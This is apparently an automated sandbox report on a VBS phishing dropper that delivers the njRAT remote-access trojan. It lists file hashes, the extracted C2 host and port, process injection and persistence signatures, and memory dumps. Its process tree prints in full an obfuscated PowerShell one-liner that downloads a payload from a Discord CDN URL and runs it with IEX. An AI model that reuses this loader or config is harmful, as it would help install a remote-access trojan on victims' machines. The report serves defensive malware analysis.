Analysis
-
max time kernel
148s -
max time network
145s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
26-10-2021 13:09
Static task
static1
Behavioral task
behavioral1
Sample
RFQ-474552121.vbs
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
RFQ-474552121.vbs
Resource
win10-en-20210920
General
-
Target
RFQ-474552121.vbs
-
Size
15KB
-
MD5
147841ac2ca60229a754403fddad59ec
-
SHA1
9de7705976aec4bedd6f8805065ac17be1282d75
-
SHA256
a88a9fc866e2da0a88fbbf44e23b39b3bb980135b0d1c1aafbbef87490c2f34c
-
SHA512
92be569b47e9a8445bfb62b44b3bf3a1116b528520a958f037967f16a0746f9ff6c23ceab63c1d7159565e20656cdf193c768323efa0e151f407b9775516f4b4
Malware Config
Extracted
njrat
v2.0
------(XxX)------
new.libya2020.com.ly:2020
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1020 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
update.exeupdate.exepid process 1536 update.exe 1940 update.exe -
Drops startup file 1 IoCs
Processes:
update.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk update.exe -
Loads dropped DLL 1 IoCs
Processes:
update.exepid process 1536 update.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
update.exedescription pid process target process PID 1536 set thread context of 1940 1536 update.exe update.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exeupdate.exedescription pid process Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1940 update.exe Token: 33 1940 update.exe Token: SeIncBasePriorityPrivilege 1940 update.exe Token: 33 1940 update.exe Token: SeIncBasePriorityPrivilege 1940 update.exe Token: 33 1940 update.exe Token: SeIncBasePriorityPrivilege 1940 update.exe Token: 33 1940 update.exe Token: SeIncBasePriorityPrivilege 1940 update.exe Token: 33 1940 update.exe Token: SeIncBasePriorityPrivilege 1940 update.exe Token: 33 1940 update.exe Token: SeIncBasePriorityPrivilege 1940 update.exe Token: 33 1940 update.exe Token: SeIncBasePriorityPrivilege 1940 update.exe Token: 33 1940 update.exe Token: SeIncBasePriorityPrivilege 1940 update.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
WScript.exepowershell.exeupdate.exedescription pid process target process PID 2004 wrote to memory of 1020 2004 WScript.exe powershell.exe PID 2004 wrote to memory of 1020 2004 WScript.exe powershell.exe PID 2004 wrote to memory of 1020 2004 WScript.exe powershell.exe PID 1020 wrote to memory of 1536 1020 powershell.exe update.exe PID 1020 wrote to memory of 1536 1020 powershell.exe update.exe PID 1020 wrote to memory of 1536 1020 powershell.exe update.exe PID 1020 wrote to memory of 1536 1020 powershell.exe update.exe PID 1020 wrote to memory of 1536 1020 powershell.exe update.exe PID 1020 wrote to memory of 1536 1020 powershell.exe update.exe PID 1020 wrote to memory of 1536 1020 powershell.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe PID 1536 wrote to memory of 1940 1536 update.exe update.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ-474552121.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/901770008810618905/902212483350147082/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\update.exe"C:\Users\Public\update.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\update.exe"C:\Users\Public\update.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\update.exeMD5
289bce792735d436f48355e55ea0276f
SHA11438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
SHA25678b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
SHA512f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
-
C:\Users\Public\update.exeMD5
289bce792735d436f48355e55ea0276f
SHA11438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
SHA25678b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
SHA512f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
-
C:\Users\Public\update.exeMD5
289bce792735d436f48355e55ea0276f
SHA11438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
SHA25678b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
SHA512f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
-
\Users\Public\update.exeMD5
289bce792735d436f48355e55ea0276f
SHA11438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
SHA25678b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
SHA512f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
-
memory/1020-56-0x0000000000000000-mapping.dmp
-
memory/1020-59-0x0000000002800000-0x0000000002802000-memory.dmpFilesize
8KB
-
memory/1020-61-0x0000000002804000-0x0000000002807000-memory.dmpFilesize
12KB
-
memory/1020-60-0x0000000002802000-0x0000000002804000-memory.dmpFilesize
8KB
-
memory/1020-58-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmpFilesize
11.4MB
-
memory/1020-62-0x000000001B750000-0x000000001BA4F000-memory.dmpFilesize
3.0MB
-
memory/1020-63-0x000000000280B000-0x000000000282A000-memory.dmpFilesize
124KB
-
memory/1536-69-0x0000000000250000-0x0000000000257000-memory.dmpFilesize
28KB
-
memory/1536-64-0x0000000000000000-mapping.dmp
-
memory/1536-70-0x0000000004A50000-0x0000000004A51000-memory.dmpFilesize
4KB
-
memory/1536-71-0x0000000000960000-0x0000000000989000-memory.dmpFilesize
164KB
-
memory/1536-67-0x0000000000910000-0x0000000000911000-memory.dmpFilesize
4KB
-
memory/1940-75-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-76-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-74-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-77-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-78-0x000000000040839E-mapping.dmp
-
memory/1940-73-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-80-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1940-82-0x0000000076231000-0x0000000076233000-memory.dmpFilesize
8KB
-
memory/1940-83-0x00000000055F0000-0x00000000055F1000-memory.dmpFilesize
4KB
-
memory/2004-55-0x000007FEFBB91000-0x000007FEFBB93000-memory.dmpFilesize
8KB